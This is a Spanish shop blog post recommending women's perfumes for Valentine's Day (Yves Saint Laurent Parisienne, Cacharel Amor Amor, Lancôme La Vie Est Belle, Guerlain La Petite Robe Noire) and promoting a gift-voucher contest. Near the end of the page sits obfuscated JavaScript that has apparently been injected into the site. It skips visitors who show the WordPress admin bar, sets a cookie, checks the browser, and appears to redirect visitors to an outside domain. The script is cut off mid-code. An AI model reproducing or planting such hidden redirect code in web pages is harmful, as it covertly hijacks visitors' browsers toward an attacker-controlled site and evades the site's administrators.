perfumes de mujer

Ya estamos en Febrero mes del amor por excelencia, hoy queremos ayudaros con un clásico para regalar en San Valentín, perfumes de mujer.

Para aquellos que necesiten una ayudita con su regalo les recomendamos que no se pierdan este post.

Un perfume de mujer dulce que no deja indiferente es Parisienne de la casa Yves Saint Laurent tomando como imagen a la musa Kate Moss representa la noche parisina, una noche de pasión y una mujer decidida a vivir la vida como si fuese la última noche.

perfumes yves saint laurent

 

 

 

 

 

 

 

 

 

 

 

 

Se trata de un perfume de mujer floral de estructura amaderada gracias al pachulí que representa a la perfección la feminidad de la mujer. Con un toque frutal debido a sus notas de salida de arándanos y moras en combinación con un toque elegante y femenino de las rosas de Damasco y las violetas.

Notas: acorde sintético de vinilo (que recuerda al plástico de los tacones elegantes de mujer), arándanos, moras, rosa de Damasco, violetas, peonías, pachulí, vetiver, musk y sándalo.

Un clásico de San Valentín desde su lanzamiento en 2003 el perfume Amor Amor de Cacharel ha sido todo un símbolo para regalar en estas fechas.

cacharel-amor-amor-eau-de-toilette

 

 

 

 

 

 

 

 

 

 

 

Un perfume  de mujer que ha sabido mantener su imagen a lo largo de los años con su carácter dulce y jovial. En su último anuncio encontramos a la española Silvia Muñoz ganadora del concurso realizado en España para ser imagen del perfume.

https://www.youtube.com/watch?v=xzMeEv7Z1HY

 

Notas: como salida encontramos un soplo de frutas cítricas y del bosque; casis, pomelo rosa, bergamota, naranja sanguina. De corazón toques florales con pétalos de jazmín sambac de Indonesia, rosa y muguet aportando feminidad. El fondo de vainilla sostenido por madera de cedro, ámbar, almizcle y haba tonka.

Otro perfume de mujer romántico por excelencia pero en este caso de la casa Lancome es La Vie Est Belle, con Julia Roberts como imagen de la fragancia. Se trata de un perfume dulce, moderno y agradable.

lancome-la-vie-est-belle-eau-de-parfum

 

 

 

 

 

 

 

 

 

 

 

Una dosificación precisa que mezcla Iris Pallida de Florencia, uno de los ingredientes más escasos y más preciosos de la perfumería, con un aura de irona. Para intensificar, se han añadido unas notas de jazmín Sambac y de flor de naranjo de Túnez.

Para terminar con otro perfume de mujer la novedad de la casa Guerlain: La Petite Robe Noire.

guerlain-la-petite-robe-noire-eau-de-parfum

 

 

 

 

 

 

 

 

 

 

 

 

Un bordado de las más bellas notas “negras” de la perfumería: cereza negra, rosa negra, pachulí y té negro. Un perfume afrutado y floral con frasco en forma de corazón, reinterpretado con un vistoso toque moderno obteniendo un resultado fresco desenfadado y fascinante.

Además queremos recordaros que tenemos un concurso especial San Valentin en el que podréis ganar 3 cheques regalo de 100€ para gastar en nuestra Tienda Online. Podréis participar en cualquiera de nuestras Redes Sociales: Facebook, Twitter e Instagram. http://ow.ly/It5Gz ¡No os lo perdáis y participad!

 

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone